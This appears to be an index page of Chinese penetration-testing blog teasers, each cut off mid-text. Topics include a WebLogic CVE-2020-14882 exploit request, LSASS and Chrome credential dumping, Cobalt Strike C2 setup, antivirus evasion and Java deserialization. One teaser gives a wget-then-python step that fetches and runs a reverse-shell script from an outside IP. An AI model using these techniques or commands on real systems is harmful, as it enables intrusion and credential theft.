CVE-2020-14882 weblogic 未授权命令执行复现
CVE-2020-14882weblogic未授权命令执行复现1.成功代码——GET请求GET/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangos
CVE-2020-14882weblogic未授权命令执行复现1.成功代码——GET请求GET/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangos
T1003-windows-Procdump明文凭证来自ATT&CK的描述凭证获取是从操作系统和软件中获取登录信息和密码的过程,通常为HASH散列或明文密码。然后使用凭证进行横向移动访问其他系统。用户登录系统后,会生成各种凭据并将其存储在内存中的本地安全机构子系统服务(LSASS)进程中。这
使用mimikatz导出chrome密码因为在拿到一台用户PC或者内网装有Chrome的服务器时,需要导出Chrome浏览器的密码。虽然市面上有很多软件可以使用,但是我发现,他们都是去默认路径下读取,如果用户将Chrome的Data数据保存在其他盘中的时候,并不能解密导出成功。所以就记录下如何使用m
参考文档:CS合法证书+Powershell上线https://bluescreenofjeff.com/2018-04-12-https-payload-and-c2-redirectors/首先,请宁打开您的购买域名的网站。添加a记录。然后,我要去freessl网站申请我买的dtgsiam.pw
大致思路:https://mp.weixin.qq.com/s/Zs_fCqZfzdzHTwVPvshFyQ他的思路跟我之前的想法差不多,但是我觉得还可以再花里胡哨一点,哈哈哈。我使用Golang(客户端)+Python和flask(服务端)来搭建这套免杀系统。主要原理:服务端关键代码:AES加密s
漏洞复现今天去绿盟那边面试,问了个关于fastjson的问题。没怎么回答上来,主要是都没怎么在实战中用到,不是很熟悉这个。问:Fastjson在遇到不出外网的情况下,如何利用。复现环境Vulhub的docker环境Fastjson1.2.24如何判断使用了Fastjson报错回显一般我是传递一个不完
主要记录一下C2Profile的配置、上线通知的配置、证书修改的配置,这三个配置在HW行动当中比较常用。1.C2Profile的配置C2Profile我用的github上面找的,可以自行找个修改下。或者按照自己的思路进行伪装,例如伪装成bing搜索的C2profile,但是好像很多APT组织用这个(
主要项目:https://github.com/arugal/frp-notify可以直接下载release版本即可,或者自行使用realse.sh进行编译。目录介绍frp-notify└───system||frp-notify.service#linux系统服务配置文件|│frp-notify#
今天突然看到一个项目发现很不错。https://github.com/j1anFen/ysoserial_echo支持:ApereoCAS4.1.X默认密钥Shirospring环境下回显Liferayprotal7.0以上本地复现环境Vulhub环境搭建git下来后,直接在ysoserial_ec
我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。先wget下载wgethttp://123.123.123.123/shell.py-O/tmp/shell.py然后再执行python/tmp/shell.py这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些
Homebrew国内镜像源腾讯云的速度比较快替换brew.git:gitremoteset-urloriginhttps://mirrors.cloud.tencent.com/homebrew/brew.git替换homebrew-core.git:gitremoteset-urloriginht
这一年里你参加了7场攻防演练,平均每场演练拿到了一万分,其中九千分都是靠shack2超级弱口令扫描爆破打下来的,你热衷于使用goby和shack2超级弱口令爆破,常常戏称自己是内网渗透大牛。喜欢和朋友讨论今年攻防演练又靠shiro,fastjson,weblogic混过了一年。你热爱学习,每天都会打
本文由简悦SimpRead转码,原文地址xiashang.xyz在红蓝对抗中,远程命令执行类漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行类漏洞从漏洞
CVE-2020-14645主要最近在研究weblogic的内存马,在github上面搜到https://github.com/feihong-cs/JNDIExploit这个项目里面有一段内存马代码,想套用到14882那个漏洞上面,但是发现cmdshell可以,冰蝎的马好像有些问题。既然他是JND
终于弄会了~我一个JAVA小白,代码只能理解,但是不会写!全靠copy。感谢宽字节potats0老哥!和奇安信Cheery老哥~放图:只实现了普通的一句话马,冰蝎马和蚁剑马还没弄好(蚁剑马有点小问题)遇到的问题:1.代码导出成Jar包:IDEA————>File————>ProjectS